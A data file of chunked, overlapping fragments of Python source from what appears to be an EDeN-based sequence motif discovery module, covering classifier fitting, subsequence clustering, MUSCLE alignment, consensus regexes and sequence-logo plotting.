"def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size,",
"confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:')",
"evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets = []",
"= output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate",
"motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin,",
"plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j))",
"else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if",
"joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a,",
"ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i]",
"alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits',",
"time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close()",
"from eden import apply_async import numpy as np from scipy.sparse import vstack from",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable,",
"in clusters: start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif(",
"id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield",
"for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in",
"/ 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids:",
"preds = [] binary_preds = [] true_targets = [] for i, (p, n)",
"start_time = time.time() scores_items = [] for i, p in enumerate(results): loc_start_time =",
"= wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format ==",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b =",
"fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info",
"motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives,",
"x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends",
"auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit =",
"norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\"",
"vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1:",
"wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna',",
"len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list = [c for",
"n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to",
"np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance",
"header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header +=",
"= estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self,",
"(i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs",
"self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f",
"tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags",
"import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import",
"secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for",
"= curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default",
"def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin,",
"for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info =",
"= plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i,",
"lines: if line: if line[0] == '>': if seq: yield seq seq =",
"'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet",
"= self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else:",
"pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup",
"in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time =",
"compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator",
"= n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator",
"seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score",
"self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class",
"time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' %",
"n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity",
"a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs",
"haystack: for match in re.finditer(needle, s): s = match.start() e = match.end() m",
"= self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq =",
"a cluster with enough space that # kmers dont interfere cluster_seqs = []",
"nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) +",
"id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname =",
"start_time = time.time() matrices = [] for i, p in enumerate(results): loc_start_time =",
"end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer,",
"code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle,",
"in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None):",
"sequences in a cluster with enough space that # kmers dont interfere cluster_seqs",
"import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence",
"seqs): # seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord",
"= self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq except",
"' ' * (complexity * 2) # join all sequences in a cluster",
"import apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3):",
"estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time =",
"= self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True",
"trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None def",
"regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str = None",
"def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs",
"seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list)",
"= error_bars if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis",
"= '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs,",
"= ids[i + 1] width = end - start val = sum(sig[start:end]) yield",
"sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score')",
"min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in",
"Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8):",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self,",
"pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test,",
"units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='',",
"nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if",
"logo_txt = [] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info)",
"align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not in",
"too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' %",
"fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2),",
"def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value)",
"% \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i",
"plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h,",
"self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" #",
"self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms:",
"s in seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores)",
"= muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs =",
"'\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>')",
"i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score,",
"j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq']",
"return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def",
"cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for",
"freq_th is None or freq >= freq_th: if std_th is None or std",
"trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width =",
"= [cluster_id for cluster_id in motives] logos = dict() for cluster_id in ids:",
"+ '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen',",
"\"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size",
"False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not",
"[] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d",
"s = match.start() e = match.end() m = s + (e - s)",
"if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet =",
"= [] for h, align_seq in align_seqs: str_list = [c for c in",
"neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs ==",
"show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label =",
"self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys)",
"the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix =",
"as wbl from scipy.cluster.hierarchy import linkage import regex as re from collections import",
"to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) / dim >=",
"for i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items +=",
"= motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)]",
"align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str)",
"= np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred =",
"= metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1,",
"self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix",
"pwd + '/' + fname txt = [] if fill_width: if output_type ==",
"= distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs %d",
"e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc",
"j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j,",
"for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs =",
"scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time",
"size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\"",
"len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\"",
"defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' %",
"= plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if",
"for h, align_seq in align_seqs: str_list = [c for c in align_seq] concat_str",
"align_seq in align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list,",
"color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image =",
"matrices = [] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix =",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d)",
"size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in",
"logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 +",
"half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size))",
"if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h,",
"self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self,",
"motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives:",
"def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives: if",
"(cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j,",
"regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq =",
"occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts)",
"curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values')",
"plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig(",
"- c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx",
"concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i,",
"cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j,",
"success = False for rel_nw_score, i, j in ms: if motives.get(i, None) and",
"if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"",
"c = Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self,",
"motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m",
"= self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self,",
"= edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j))",
"min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size))",
"['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition",
"st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs,",
"pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters)",
"subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time",
"min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time",
"j] += 1 if i != j: # find closest instance j from",
"trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not in to_be_removed]",
"== -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool,",
"_, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives)",
"+ motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if",
"(metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results",
"elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self,",
"= tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives,",
"return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report",
"popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' %",
"letter_regex(k, size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack):",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b",
"subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for",
"\"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs)",
"<= p_value: yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed",
"muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = ['']",
"MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out =",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] ==",
"any instance in i d_ij = [] for c_i in centers[i]: for c_j",
"None: ids = [cluster_id for cluster_id in motives] logos = dict() for cluster_id",
"regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size",
"Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname",
"with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if",
"if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if",
"txt.append(info) info = ' - freq of occurrences of regex: %.2f' % (fr)",
"@email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os from collections",
"y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC:",
"% motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives:",
"j: # find closest instance j from any instance in i d_ij =",
"handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params =",
"Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit",
"= header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin",
"+ np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on",
"\"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else:",
"= [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin,",
"in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time =",
"= time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix,",
"seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time",
"for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j =",
"else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None,",
"i in motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id,",
"data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs #",
"similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th)",
"= random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative",
"e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test =",
"haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0",
"is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else:",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5):",
"= 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j,",
"\"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None,",
"c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if",
"= wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options",
"'>': if seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip()",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process,",
"- y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = []",
"/ float(size) > regex_th: if letter != '-': code.append(letter) if len(code) == 0:",
"import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy",
"a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b))",
"params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def",
"predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y",
"fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid,",
"neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm)",
"filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d",
"chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time()",
"reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for",
"quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5,",
"subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>'",
"sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is",
"@author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os",
"_decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end",
"line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield",
"cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname)",
"motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] =",
"in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for",
"y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc,",
"if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if",
"sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s",
